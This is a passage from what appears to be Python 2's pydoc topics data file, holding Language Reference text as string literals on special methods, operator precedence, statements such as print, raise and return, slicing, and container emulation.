'of\n' ' different types. [2] For instance, to evaluate the ' 'expression "x -\n' ' y", where *y* is an instance of a class that has an ' '"__rsub__()"\n' ' method, "y.__rsub__(x)" is called if "x.__sub__(y)" ' 'returns\n' ' *NotImplemented*.\n' '\n' ' Note that ternary "pow()" will not try calling ' '"__rpow__()" (the\n' ' coercion rules would become too complicated).\n' '\n' " Note: If the right operand's type is a subclass of the " 'left\n' " operand's type and that subclass provides the " 'reflected method\n' ' for the operation, this method will be called before ' 'the left\n' " operand's non-reflected method. This behavior allows " 'subclasses\n' " to override their ancestors' operations.\n" '\n' 'object.__iadd__(self, other)\n' 'object.__isub__(self, other)\n' 'object.__imul__(self, other)\n' 'object.__idiv__(self, other)\n' 'object.__itruediv__(self, other)\n' 'object.__ifloordiv__(self, other)\n' 'object.__imod__(self, other)\n' 'object.__ipow__(self, other[, modulo])\n' 'object.__ilshift__(self, other)\n' 'object.__irshift__(self, other)\n' 'object.__iand__(self, other)\n' 'object.__ixor__(self, other)\n' 'object.__ior__(self, other)\n' '\n' ' These methods are called to implement the augmented ' 'arithmetic\n' ' assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", ' '"<<=",\n' ' ">>=", "&=", "^=", "|="). These methods should attempt ' 'to do the\n' ' operation in-place (modifying *self*) and return the ' 'result (which\n' ' could be, but does not have to be, *self*). If a ' 'specific method\n' ' is not defined, the augmented assignment falls back to ' 'the normal\n' ' methods. For instance, to execute the statement "x += ' 'y", where\n' ' *x* is an instance of a class that has an "__iadd__()" ' 'method,\n' ' "x.__iadd__(y)" is called. If *x* is an instance of a ' 'class that\n' ' does not define a "__iadd__()" method, "x.__add__(y)" ' 'and\n' ' "y.__radd__(x)" are considered, as with the evaluation ' 'of "x + y".\n' '\n' 'object.__neg__(self)\n' 'object.__pos__(self)\n' 'object.__abs__(self)\n' 'object.__invert__(self)\n' '\n' ' Called to implement the unary arithmetic operations ' '("-", "+",\n' ' "abs()" and "~").\n' '\n' 'object.__complex__(self)\n' 'object.__int__(self)\n' 'object.__long__(self)\n' 'object.__float__(self)\n' '\n' ' Called to implement the built-in functions "complex()", ' '"int()",\n' ' "long()", and "float()". Should return a value of the ' 'appropriate\n' ' type.\n' '\n' 'object.__oct__(self)\n' 'object.__hex__(self)\n' '\n' ' Called to implement the built-in functions "oct()" and ' '"hex()".\n' ' Should return a string value.\n' '\n' 'object.__index__(self)\n' '\n' ' Called to implement "operator.index()". Also called ' 'whenever\n' ' Python needs an integer object (such as in slicing). ' 'Must return\n' ' an integer (int or long).\n' '\n' ' New in version 2.5.\n' '\n' 'object.__coerce__(self, other)\n' '\n' ' Called to implement "mixed-mode" numeric arithmetic. ' 'Should either\n' ' return a 2-tuple containing *self* and *other* converted ' 'to a\n' ' common numeric type, or "None" if conversion is ' 'impossible. When\n' ' the common type would be the type of "other", it is ' 'sufficient to\n' ' return "None", since the interpreter will also ask the ' 'other object\n' ' to attempt a coercion (but sometimes, if the ' 'implementation of the\n' ' other type cannot be changed, it is useful to do the ' 'conversion to\n' ' the other type here). A return value of ' '"NotImplemented" is\n' ' equivalent to returning "None".\n', 'objects': '\n' 'Objects, values and types\n' '*************************\n' '\n' "*Objects* are Python's abstraction for data. All data in a " 'Python\n' 'program is represented by objects or by relations between ' 'objects. (In\n' 'a sense, and in conformance to Von Neumann\'s model of a "stored\n' 'program computer," code is also represented by objects.)\n' '\n' "Every object has an identity, a type and a value. An object's\n" '*identity* never changes once it has been created; you may think ' 'of it\n' 'as the object\'s address in memory. The \'"is"\' operator ' 'compares the\n' 'identity of two objects; the "id()" function returns an integer\n' 'representing its identity (currently implemented as its address). ' 'An\n' "object's *type* is also unchangeable. [1] An object's type " 'determines\n' 'the operations that the object supports (e.g., "does it have a\n' 'length?") and also defines the possible values for objects of ' 'that\n' 'type. The "type()" function returns an object\'s type (which is ' 'an\n' 'object itself). The *value* of some objects can change. ' 'Objects\n' 'whose value can change are said to be *mutable*; objects whose ' 'value\n' 'is unchangeable once they are created are called *immutable*. ' '(The\n' 'value of an immutable container object that contains a reference ' 'to a\n' "mutable object can change when the latter's value is changed; " 'however\n' 'the container is still considered immutable, because the ' 'collection of\n' 'objects it contains cannot be changed. So, immutability is not\n' 'strictly the same as having an unchangeable value, it is more ' 'subtle.)\n' "An object's mutability is determined by its type; for instance,\n" 'numbers, strings and tuples are immutable, while dictionaries ' 'and\n' 'lists are mutable.\n' '\n' 'Objects are never explicitly destroyed; however, when they ' 'become\n' 'unreachable they may be garbage-collected. An implementation is\n' 'allowed to postpone garbage collection or omit it altogether --- ' 'it is\n' 'a matter of implementation quality how garbage collection is\n' 'implemented, as long as no objects are collected that are still\n' 'reachable.\n' '\n' '**CPython implementation detail:** CPython currently uses a ' 'reference-\n' 'counting scheme with (optional) delayed detection of cyclically ' 'linked\n' 'garbage, which collects most objects as soon as they become\n' 'unreachable, but is not guaranteed to collect garbage containing\n' 'circular references. See the documentation of the "gc" module ' 'for\n' 'information on controlling the collection of cyclic garbage. ' 'Other\n' 'implementations act differently and CPython may change. Do not ' 'depend\n' 'on immediate finalization of objects when they become unreachable ' '(ex:\n' 'always close files).\n' '\n' "Note that the use of the implementation's tracing or debugging\n" 'facilities may keep objects alive that would normally be ' 'collectable.\n' 'Also note that catching an exception with a \'"try"..."except"\'\n' 'statement may keep objects alive.\n' '\n' 'Some objects contain references to "external" resources such as ' 'open\n' 'files or windows. It is understood that these resources are ' 'freed\n' 'when the object is garbage-collected, but since garbage ' 'collection is\n' 'not guaranteed to happen, such objects also provide an explicit ' 'way to\n' 'release the external resource, usually a "close()" method. ' 'Programs\n' 'are strongly recommended to explicitly close such objects. The\n' '\'"try"..."finally"\' statement provides a convenient way to do ' 'this.\n' '\n' 'Some objects contain references to other objects; these are ' 'called\n' '*containers*. Examples of containers are tuples, lists and\n' "dictionaries. The references are part of a container's value. " 'In\n' 'most cases, when we talk about the value of a container, we imply ' 'the\n' 'values, not the identities of the contained objects; however, ' 'when we\n' 'talk about the mutability of a container, only the identities of ' 'the\n' 'immediately contained objects are implied. So, if an immutable\n' 'container (like a tuple) contains a reference to a mutable ' 'object, its\n' 'value changes if that mutable object is changed.\n' '\n' 'Types affect almost all aspects of object behavior. Even the\n' 'importance of object identity is affected in some sense: for ' 'immutable\n' 'types, operations that compute new values may actually return a\n' 'reference to any existing object with the same type and value, ' 'while\n' 'for mutable objects this is not allowed. E.g., after "a = 1; b = ' '1",\n' '"a" and "b" may or may not refer to the same object with the ' 'value\n' 'one, depending on the implementation, but after "c = []; d = []", ' '"c"\n' 'and "d" are guaranteed to refer to two different, unique, newly\n' 'created empty lists. (Note that "c = d = []" assigns the same ' 'object\n' 'to both "c" and "d".)\n', 'operator-summary': '\n' 'Operator precedence\n' '*******************\n' '\n' 'The following table summarizes the operator precedences ' 'in Python,\n' 'from lowest precedence (least binding) to highest ' 'precedence (most\n' 'binding). Operators in the same box have the same ' 'precedence. Unless\n' 'the syntax is explicitly given, operators are binary. ' 'Operators in\n' 'the same box group left to right (except for ' 'comparisons, including\n' 'tests, which all have the same precedence and chain from ' 'left to right\n' '--- see section Comparisons --- and exponentiation, ' 'which groups from\n' 'right to left).\n' '\n' '+-------------------------------------------------+---------------------------------------+\n' '| Operator | ' 'Description |\n' '+=================================================+=======================================+\n' '| "lambda" | ' 'Lambda expression |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "if" -- "else" | ' 'Conditional expression |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "or" | ' 'Boolean OR |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "and" | ' 'Boolean AND |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "not" "x" | ' 'Boolean NOT |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "in", "not in", "is", "is not", "<", "<=", ">", | ' 'Comparisons, including membership |\n' '| ">=", "<>", "!=", "==" | ' 'tests and identity tests |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "|" | ' 'Bitwise OR |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "^" | ' 'Bitwise XOR |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "&" | ' 'Bitwise AND |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "<<", ">>" | ' 'Shifts |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "+", "-" | ' 'Addition and subtraction |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "*", "/", "//", "%" | ' 'Multiplication, division, remainder |\n' '| | ' '[8] |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "+x", "-x", "~x" | ' 'Positive, negative, bitwise NOT |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "**" | ' 'Exponentiation [9] |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "x[index]", "x[index:index]", | ' 'Subscription, slicing, call, |\n' '| "x(arguments...)", "x.attribute" | ' 'attribute reference |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "(expressions...)", "[expressions...]", "{key: | ' 'Binding or tuple display, list |\n' '| value...}", "`expressions...`" | ' 'display, dictionary display, string |\n' '| | ' 'conversion |\n' '+-------------------------------------------------+---------------------------------------+\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] In Python 2.3 and later releases, a list ' 'comprehension "leaks"\n' ' the control variables of each "for" it contains into ' 'the\n' ' containing scope. However, this behavior is ' 'deprecated, and\n' ' relying on it will not work in Python 3.\n' '\n' '[2] While "abs(x%y) < abs(y)" is true mathematically, ' 'for floats\n' ' it may not be true numerically due to roundoff. For ' 'example, and\n' ' assuming a platform on which a Python float is an ' 'IEEE 754 double-\n' ' precision number, in order that "-1e-100 % 1e100" ' 'have the same\n' ' sign as "1e100", the computed result is "-1e-100 + ' '1e100", which\n' ' is numerically exactly equal to "1e100". The ' 'function\n' ' "math.fmod()" returns a result whose sign matches ' 'the sign of the\n' ' first argument instead, and so returns "-1e-100" in ' 'this case.\n' ' Which approach is more appropriate depends on the ' 'application.\n' '\n' '[3] If x is very close to an exact integer multiple of ' "y, it's\n" ' possible for "floor(x/y)" to be one larger than ' '"(x-x%y)/y" due to\n' ' rounding. In such cases, Python returns the latter ' 'result, in\n' ' order to preserve that "divmod(x,y)[0] * y + x % y" ' 'be very close\n' ' to "x".\n' '\n' '[4] While comparisons between unicode strings make sense ' 'at the\n' ' byte level, they may be counter-intuitive to users. ' 'For example,\n' ' the strings "u"\\u00C7"" and "u"\\u0043\\u0327"" ' 'compare differently,\n' ' even though they both represent the same unicode ' 'character (LATIN\n' ' CAPITAL LETTER C WITH CEDILLA). To compare strings ' 'in a human\n' ' recognizable way, compare using ' '"unicodedata.normalize()".\n' '\n' '[5] The implementation computes this efficiently, ' 'without\n' ' constructing lists or sorting.\n' '\n' '[6] Earlier versions of Python used lexicographic ' 'comparison of\n' ' the sorted (key, value) lists, but this was very ' 'expensive for the\n' ' common case of comparing for equality. An even ' 'earlier version of\n' ' Python compared dictionaries by identity only, but ' 'this caused\n' ' surprises because people expected to be able to test ' 'a dictionary\n' ' for emptiness by comparing it to "{}".\n' '\n' '[7] Due to automatic garbage-collection, free lists, and ' 'the\n' ' dynamic nature of descriptors, you may notice ' 'seemingly unusual\n' ' behaviour in certain uses of the "is" operator, like ' 'those\n' ' involving comparisons between instance methods, or ' 'constants.\n' ' Check their documentation for more info.\n' '\n' '[8] The "%" operator is also used for string formatting; ' 'the same\n' ' precedence applies.\n' '\n' '[9] The power operator "**" binds less tightly than an ' 'arithmetic\n' ' or bitwise unary operator on its right, that is, ' '"2**-1" is "0.5".\n', 'pass': '\n' 'The "pass" statement\n' '********************\n' '\n' ' pass_stmt ::= "pass"\n' '\n' '"pass" is a null operation --- when it is executed, nothing ' 'happens.\n' 'It is useful as a placeholder when a statement is required\n' 'syntactically, but no code needs to be executed, for example:\n' '\n' ' def f(arg): pass # a function that does nothing (yet)\n' '\n' ' class C: pass # a class with no methods (yet)\n', 'power': '\n' 'The power operator\n' '******************\n' '\n' 'The power operator binds more tightly than unary operators on its\n' 'left; it binds less tightly than unary operators on its right. ' 'The\n' 'syntax is:\n' '\n' ' power ::= primary ["**" u_expr]\n' '\n' 'Thus, in an unparenthesized sequence of power and unary operators, ' 'the\n' 'operators are evaluated from right to left (this does not ' 'constrain\n' 'the evaluation order for the operands): "-1**2" results in "-1".\n' '\n' 'The power operator has the same semantics as the built-in "pow()"\n' 'function, when called with two arguments: it yields its left ' 'argument\n' 'raised to the power of its right argument. The numeric arguments ' 'are\n' 'first converted to a common type. The result type is that of the\n' 'arguments after coercion.\n' '\n' 'With mixed operand types, the coercion rules for binary arithmetic\n' 'operators apply. For int and long int operands, the result has the\n' 'same type as the operands (after coercion) unless the second ' 'argument\n' 'is negative; in that case, all arguments are converted to float and ' 'a\n' 'float result is delivered. For example, "10**2" returns "100", but\n' '"10**-2" returns "0.01". (This last feature was added in Python ' '2.2.\n' 'In Python 2.1 and before, if both arguments were of integer types ' 'and\n' 'the second argument was negative, an exception was raised).\n' '\n' 'Raising "0.0" to a negative power results in a ' '"ZeroDivisionError".\n' 'Raising a negative number to a fractional power results in a\n' '"ValueError".\n', 'print': '\n' 'The "print" statement\n' '*********************\n' '\n' ' print_stmt ::= "print" ([expression ("," expression)* [","]]\n' ' | ">>" expression [("," expression)+ [","]])\n' '\n' '"print" evaluates each expression in turn and writes the resulting\n' 'object to standard output (see below). If an object is not a ' 'string,\n' 'it is first converted to a string using the rules for string\n' 'conversions. The (resulting or original) string is then written. ' 'A\n' 'space is written before each object is (converted and) written, ' 'unless\n' 'the output system believes it is positioned at the beginning of a\n' 'line. This is the case (1) when no characters have yet been ' 'written\n' 'to standard output, (2) when the last character written to ' 'standard\n' 'output is a whitespace character except "\' \'", or (3) when the ' 'last\n' 'write operation on standard output was not a "print" statement. ' '(In\n' 'some cases it may be functional to write an empty string to ' 'standard\n' 'output for this reason.)\n' '\n' 'Note: Objects which act like file objects but which are not the\n' ' built-in file objects often do not properly emulate this aspect ' 'of\n' " the file object's behavior, so it is best not to rely on this.\n" '\n' 'A "\'\\n\'" character is written at the end, unless the "print" ' 'statement\n' 'ends with a comma. This is the only action if the statement ' 'contains\n' 'just the keyword "print".\n' '\n' 'Standard output is defined as the file object named "stdout" in ' 'the\n' 'built-in module "sys". If no such object exists, or if it does ' 'not\n' 'have a "write()" method, a "RuntimeError" exception is raised.\n' '\n' '"print" also has an extended form, defined by the second portion ' 'of\n' 'the syntax described above. This form is sometimes referred to as\n' '""print" chevron." In this form, the first expression after the ' '">>"\n' 'must evaluate to a "file-like" object, specifically an object that ' 'has\n' 'a "write()" method as described above. With this extended form, ' 'the\n' 'subsequent expressions are printed to this file object. If the ' 'first\n' 'expression evaluates to "None", then "sys.stdout" is used as the ' 'file\n' 'for output.\n', 'raise': '\n' 'The "raise" statement\n' '*********************\n' '\n' ' raise_stmt ::= "raise" [expression ["," expression ["," ' 'expression]]]\n' '\n' 'If no expressions are present, "raise" re-raises the last ' 'exception\n' 'that was active in the current scope. If no exception is active ' 'in\n' 'the current scope, a "TypeError" exception is raised indicating ' 'that\n' 'this is an error (if running under IDLE, a "Queue.Empty" exception ' 'is\n' 'raised instead).\n' '\n' 'Otherwise, "raise" evaluates the expressions to get three objects,\n' 'using "None" as the value of omitted expressions. The first two\n' 'objects are used to determine the *type* and *value* of the ' 'exception.\n' '\n' 'If the first object is an instance, the type of the exception is ' 'the\n' 'class of the instance, the instance itself is the value, and the\n' 'second object must be "None".\n' '\n' 'If the first object is a class, it becomes the type of the ' 'exception.\n' 'The second object is used to determine the exception value: If it ' 'is\n' 'an instance of the class, the instance becomes the exception value. ' 'If\n' 'the second object is a tuple, it is used as the argument list for ' 'the\n' 'class constructor; if it is "None", an empty argument list is ' 'used,\n' 'and any other object is treated as a single argument to the\n' 'constructor. The instance so created by calling the constructor ' 'is\n' 'used as the exception value.\n' '\n' 'If a third object is present and not "None", it must be a ' 'traceback\n' 'object (see section The standard type hierarchy), and it is\n' 'substituted instead of the current location as the place where the\n' 'exception occurred. If the third object is present and not a\n' 'traceback object or "None", a "TypeError" exception is raised. ' 'The\n' 'three-expression form of "raise" is useful to re-raise an ' 'exception\n' 'transparently in an except clause, but "raise" with no expressions\n' 'should be preferred if the exception to be re-raised was the most\n' 'recently active exception in the current scope.\n' '\n' 'Additional information on exceptions can be found in section\n' 'Exceptions, and information about handling exceptions is in ' 'section\n' 'The try statement.\n', 'return': '\n' 'The "return" statement\n' '**********************\n' '\n' ' return_stmt ::= "return" [expression_list]\n' '\n' '"return" may only occur syntactically nested in a function ' 'definition,\n' 'not within a nested class definition.\n' '\n' 'If an expression list is present, it is evaluated, else "None" is\n' 'substituted.\n' '\n' '"return" leaves the current function call with the expression list ' '(or\n' '"None") as return value.\n' '\n' 'When "return" passes control out of a "try" statement with a ' '"finally"\n' 'clause, that "finally" clause is executed before really leaving ' 'the\n' 'function.\n' '\n' 'In a generator function, the "return" statement is not allowed to\n' 'include an "expression_list". In that context, a bare "return"\n' 'indicates that the generator is done and will cause ' '"StopIteration" to\n' 'be raised.\n', 'sequence-types': '\n' 'Emulating container types\n' '*************************\n' '\n' 'The following methods can be defined to implement ' 'container objects.\n' 'Containers usually are sequences (such as lists or tuples) ' 'or mappings\n' '(like dictionaries), but can represent other containers as ' 'well. The\n' 'first set of methods is used either to emulate a sequence ' 'or to\n' 'emulate a mapping; the difference is that for a sequence, ' 'the\n' 'allowable keys should be the integers *k* for which "0 <= ' 'k < N" where\n' '*N* is the length of the sequence, or slice objects, which ' 'define a\n' 'range of items. (For backwards compatibility, the method\n' '"__getslice__()" (see below) can also be defined to handle ' 'simple, but\n' 'not extended slices.) It is also recommended that mappings ' 'provide the\n' 'methods "keys()", "values()", "items()", "has_key()", ' '"get()",\n' '"clear()", "setdefault()", "iterkeys()", "itervalues()",\n' '"iteritems()", "pop()", "popitem()", "copy()", and ' '"update()" behaving\n' "similar to those for Python's standard dictionary " 'objects. The\n' '"UserDict" module provides a "DictMixin" class to help ' 'create those\n' 'methods from a base set of "__getitem__()", ' '"__setitem__()",\n' '"__delitem__()", and "keys()". Mutable sequences should ' 'provide\n' 'methods "append()", "count()", "index()", "extend()", ' '"insert()",\n' '"pop()", "remove()", "reverse()" and "sort()", like Python ' 'standard\n' 'list objects. Finally, sequence types should implement ' 'addition\n' '(meaning concatenation) and multiplication (meaning ' 'repetition) by\n' 'defining the methods "__add__()", "__radd__()", ' '"__iadd__()",\n' '"__mul__()", "__rmul__()" and "__imul__()" described ' 'below; they\n' 'should not define "__coerce__()" or other numerical ' 'operators. It is\n' 'recommended that both mappings and sequences implement ' 'the\n' '"__contains__()" method to allow efficient use of the "in" ' 'operator;\n' 'for mappings, "in" should be equivalent of "has_key()"; ' 'for sequences,\n' 'it should search through the values. It is further ' 'recommended that\n' 'both mappings and sequences implement the "__iter__()" ' 'method to allow\n' 'efficient iteration through the container; for mappings, ' '"__iter__()"\n' 'should be the same as "iterkeys()"; for sequences, it ' 'should iterate\n' 'through the values.\n' '\n' 'object.__len__(self)\n' '\n' ' Called to implement the built-in function "len()". ' 'Should return\n' ' the length of the object, an integer ">=" 0. Also, an ' 'object that\n' ' doesn\'t define a "__nonzero__()" method and whose ' '"__len__()"\n' ' method returns zero is considered to be false in a ' 'Boolean context.\n' '\n' 'object.__getitem__(self, key)\n' '\n' ' Called to implement evaluation of "self[key]". For ' 'sequence types,\n' ' the accepted keys should be integers and slice ' 'objects. Note that\n' ' the special interpretation of negative indexes (if the ' 'class wishes\n' ' to emulate a sequence type) is up to the ' '"__getitem__()" method. If\n' ' *key* is of an inappropriate type, "TypeError" may be ' 'raised; if of\n' ' a value outside the set of indexes for the sequence ' '(after any\n' ' special interpretation of negative values), ' '"IndexError" should be\n' ' raised. For mapping types, if *key* is missing (not in ' 'the\n' ' container), "KeyError" should be raised.\n' '\n' ' Note: "for" loops expect that an "IndexError" will be ' 'raised for\n' ' illegal indexes to allow proper detection of the end ' 'of the\n' ' sequence.\n' '\n' 'object.__missing__(self, key)\n' '\n' ' Called by "dict"."__getitem__()" to implement ' '"self[key]" for dict\n' ' subclasses when key is not in the dictionary.\n' '\n' 'object.__setitem__(self, key, value)\n' '\n' ' Called to implement assignment to "self[key]". Same ' 'note as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support changes to the values for keys, or ' 'if new keys\n' ' can be added, or for sequences if elements can be ' 'replaced. The\n' ' same exceptions should be raised for improper *key* ' 'values as for\n' ' the "__getitem__()" method.\n' '\n' 'object.__delitem__(self, key)\n' '\n' ' Called to implement deletion of "self[key]". Same note ' 'as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support removal of keys, or for sequences ' 'if elements\n' ' can be removed from the sequence. The same exceptions ' 'should be\n' ' raised for improper *key* values as for the ' '"__getitem__()" method.\n' '\n' 'object.__iter__(self)\n' '\n' ' This method is called when an iterator is required for ' 'a container.\n' ' This method should return a new iterator object that ' 'can iterate\n' ' over all the objects in the container. For mappings, ' 'it should\n' ' iterate over the keys of the container, and should also ' 'be made\n' ' available as the method "iterkeys()".\n' '\n' ' Iterator objects also need to implement this method; ' 'they are\n' ' required to return themselves. For more information on ' 'iterator\n' ' objects, see Iterator Types.\n' '\n' 'object.__reversed__(self)\n' '\n' ' Called (if present) by the "reversed()" built-in to ' 'implement\n' ' reverse iteration. It should return a new iterator ' 'object that\n' ' iterates over all the objects in the container in ' 'reverse order.\n' '\n' ' If the "__reversed__()" method is not provided, the ' '"reversed()"\n' ' built-in will fall back to using the sequence protocol ' '("__len__()"\n' ' and "__getitem__()"). Objects that support the ' 'sequence protocol\n' ' should only provide "__reversed__()" if they can ' 'provide an\n' ' implementation that is more efficient than the one ' 'provided by\n' ' "reversed()".\n' '\n' ' New in version 2.6.\n' '\n' 'The membership test operators ("in" and "not in") are ' 'normally\n' 'implemented as an iteration through a sequence. However, ' 'container\n' 'objects can supply the following special method with a ' 'more efficient\n' 'implementation, which also does not require the object be ' 'a sequence.\n' '\n' 'object.__contains__(self, item)\n' '\n' ' Called to implement membership test operators. Should ' 'return true\n' ' if *item* is in *self*, false otherwise. For mapping ' 'objects, this\n' ' should consider the keys of the mapping rather than the ' 'values or\n' ' the key-item pairs.\n' '\n' ' For objects that don\'t define "__contains__()", the ' 'membership test\n' ' first tries iteration via "__iter__()", then the old ' 'sequence\n' ' iteration protocol via "__getitem__()", see this ' 'section in the\n' ' language reference.\n', 'shifting': '\n' 'Shifting operations\n' '*******************\n' '\n' 'The shifting operations have lower priority than the arithmetic\n' 'operations:\n' '\n' ' shift_expr ::= a_expr | shift_expr ( "<<" | ">>" ) a_expr\n' '\n' 'These operators accept plain or long integers as arguments. ' 'The\n' 'arguments are converted to a common type. They shift the first\n' 'argument to the left or right by the number of bits given by ' 'the\n' 'second argument.\n' '\n' 'A right shift by *n* bits is defined as division by "pow(2, ' 'n)". A\n' 'left shift by *n* bits is defined as multiplication with "pow(2, ' 'n)".\n' 'Negative shift counts raise a "ValueError" exception.\n' '\n' 'Note: In the current implementation, the right-hand operand is\n' ' required to be at most "sys.maxsize". If the right-hand ' 'operand is\n' ' larger than "sys.maxsize" an "OverflowError" exception is ' 'raised.\n', 'slicings': '\n' 'Slicings\n' '********\n' '\n' 'A slicing selects a range of items in a sequence object (e.g., ' 'a\n' 'string, tuple or list). Slicings may be used as expressions or ' 'as\n' 'targets in assignment or "del" statements. The syntax for a ' 'slicing:\n' '\n' ' slicing ::= simple_slicing | extended_slicing\n' ' simple_slicing ::= primary "[" short_slice "]"\n' ' extended_slicing ::= primary "[" slice_list "]"\n' ' slice_list ::= slice_item ("," slice_item)* [","]\n' ' slice_item ::= expression | proper_slice | ellipsis\n' ' proper_slice ::= short_slice | long_slice\n' ' short_slice ::= [lower_bound] ":" [upper_bound]\n' ' long_slice ::= short_slice ":" [stride]\n' ' lower_bound ::= expression\n' ' upper_bound ::= expression\n' ' stride ::= expression\n' ' ellipsis ::= "..."\n' '\n' 'There is ambiguity in the formal syntax here: anything that ' 'looks like\n' 'an expression list also looks like a slice list, so any ' 'subscription\n' 'can be interpreted as a slicing. Rather than further ' 'complicating the\n' 'syntax, this is disambiguated by defining that in this case the\n' 'interpretation as a subscription takes priority over the\n' 'interpretation as a slicing (this is the case if the slice list\n' 'contains no proper slice nor ellipses). Similarly, when the ' 'slice\n' 'list has exactly one short slice and no trailing comma, the\n' 'interpretation as a simple slicing takes priority over that as ' 'an\n' 'extended slicing.\n' '\n' 'The semantics for a simple slicing are as follows. The primary ' 'must\n' 'evaluate to a sequence object. The lower and upper bound ' 'expressions,\n' 'if present, must evaluate to plain integers; defaults are zero ' 'and the\n' '"sys.maxint", respectively. If either bound is negative, the\n' "sequence's length is added to it. The slicing now selects all " 'items\n' 'with index *k* such that "i <= k < j" where *i* and *j* are the\n' 'specified lower and upper bounds. This may be an empty ' 'sequence. It\n' 'is not an error if *i* or *j* lie outside the range of valid ' 'indexes\n' "(such items don't exist so they aren't selected).\n" '\n' 'The semantics for an extended slicing are as follows. The ' 'primary\n' 'must evaluate to a mapping object, and it is indexed with a key ' 'that\n' 'is constructed from the slice list, as follows. If the slice ' 'list\n' 'contains at least one comma, the key is a tuple containing the\n' 'conversion of the slice items; otherwise, the conversion of the ' 'lone\n' 'slice item is the key. The conversion of a slice item that is ' 'an\n' 'expression is that expression. The conversion of an ellipsis ' 'slice\n' 'item is the built-in "Ellipsis" object. The conversion of a ' 'proper\n' 'slice is a slice object (see section The standard type ' 'hierarchy)\n' 'whose "start", "stop" and "step" attributes are the values of ' 'the\n' 'expressions given as lower bound, upper bound and stride,\n' 'respectively, substituting "None" for missing expressions.\n', 'specialattrs': '\n' 'Special Attributes\n' '******************\n' '\n' 'The implementation adds a few special read-only attributes ' 'to several\n' 'object types, where they are relevant. Some of these are ' 'not reported\n' 'by the "dir()" built-in function.\n' '\n' 'object.__dict__\n' '\n' ' A dictionary or other mapping object used to store an ' "object's\n" ' (writable) attributes.\n' '\n' 'object.__methods__\n' '\n' ' Deprecated since version 2.2: Use the built-in function ' '"dir()" to\n' " get a list of an object's attributes. This attribute is " 'no longer\n' ' available.\n' '\n' 'object.__members__\n' '\n' ' Deprecated since version 2.2: Use the built-in function ' '"dir()" to\n' " get a list of an object's attributes. This attribute is " 'no longer\n' ' available.\n' '\n' 'instance.__class__\n' '\n' ' The class to which a class instance belongs.\n' '\n' 'class.__bases__\n' '\n' ' The tuple of base classes of a class object.\n' '\n' 'class.__name__\n' '\n' ' The name of the class or type.\n' '\n' 'The following attributes are only supported by *new-style ' 'class*es.\n' '\n' 'class.__mro__\n' '\n' ' This attribute is a tuple of classes that are considered ' 'when\n' ' looking for base classes during method resolution.\n' '\n' 'class.mro()\n' '\n' ' This method can be overridden by a metaclass to customize ' 'the\n' ' method resolution order for its instances. It is called ' 'at class\n' ' instantiation, and its result is stored in "__mro__".\n' '\n' 'class.__subclasses__()\n' '\n' ' Each new-style class keeps a list of weak references to ' 'its\n' ' immediate subclasses. This method returns a list of all ' 'those\n' ' references still alive. Example:\n' '\n' ' >>> int.__subclasses__()\n' " [<type 'bool'>]\n" '\n' '-[ Footnotes ]-\n' '\n' '[1] Additional information on these special methods may be ' 'found\n' ' in the Python Reference Manual (Basic customization).\n' '\n' '[2] As a consequence, the list "[1, 2]" is considered equal ' 'to\n' ' "[1.0, 2.0]", and similarly for tuples.\n' '\n' "[3] They must have since the parser can't tell the type of " 'the\n' ' operands.\n' '\n' '[4] Cased characters are those with general category ' 'property\n' ' being one of "Lu" (Letter, uppercase), "Ll" (Letter, ' 'lowercase),\n' ' or "Lt" (Letter, titlecase).\n' '\n' '[5] To format only a tuple you should therefore provide a\n' ' singleton tuple whose only element is the tuple to be ' 'formatted.\n' '\n' '[6] The advantage of leaving the newline on is that ' 'returning an\n' ' empty string is then an unambiguous EOF indication. It ' 'is also\n' ' possible (in cases where it might matter, for example, ' 'if you want\n' ' to make an exact copy of a file while scanning its ' 'lines) to tell\n' ' whether the last line of a file ended in a newline or ' 'not (yes\n' ' this happens!).\n', 'specialnames': '\n' 'Special method names\n' '********************\n' '\n' 'A class can implement certain operations that are invoked by ' 'special\n' 'syntax (such as arithmetic operations or subscripting and ' 'slicing) by\n' "defining methods with special names. This is Python's " 'approach to\n' '*operator overloading*, allowing classes to define their own ' 'behavior\n' 'with respect to language operators. For instance, if a ' 'class defines\n' 'a method named "__getitem__()", and "x" is an instance of ' 'this class,\n' 'then "x[i]" is roughly equivalent to "x.__getitem__(i)" for ' 'old-style\n' 'classes and "type(x).__getitem__(x, i)" for new-style ' 'classes. Except\n' 'where mentioned, attempts to execute an operation raise an ' 'exception\n' 'when no appropriate method is defined (typically ' '"AttributeError" or\n' '"TypeError").\n' '\n' 'When implementing a class that emulates any built-in type, ' 'it is\n' 'important that the emulation only be implemented to the ' 'degree that it\n' 'makes sense for the object being modelled. For example, ' 'some\n' 'sequences may work well with retrieval of individual ' 'elements, but\n' 'extracting a slice may not make sense. (One example of this ' 'is the\n' '"NodeList" interface in the W3C\'s Document Object Model.)\n' '\n' '\n' 'Basic customization\n' '===================\n' '\n' 'object.__new__(cls[, ...])\n' '\n' ' Called to create a new instance of class *cls*. ' '"__new__()" is a\n' ' static method (special-cased so you need not declare it ' 'as such)\n' ' that takes the class of which an instance was requested ' 'as its\n' ' first argument. The remaining arguments are those passed ' 'to the\n' ' object constructor expression (the call to the class). ' 'The return\n' ' value of "__new__()" should be the new object instance ' '(usually an\n' ' instance of *cls*).\n' '\n' ' Typical implementations create a new instance of the ' 'class by\n' ' invoking the superclass\'s "__new__()" method using\n' ' "super(currentclass, cls).__new__(cls[, ...])" with ' 'appropriate\n' ' arguments and then modifying the newly-created instance ' 'as\n' ' necessary before returning it.\n' '\n' ' If "__new__()" returns an instance of 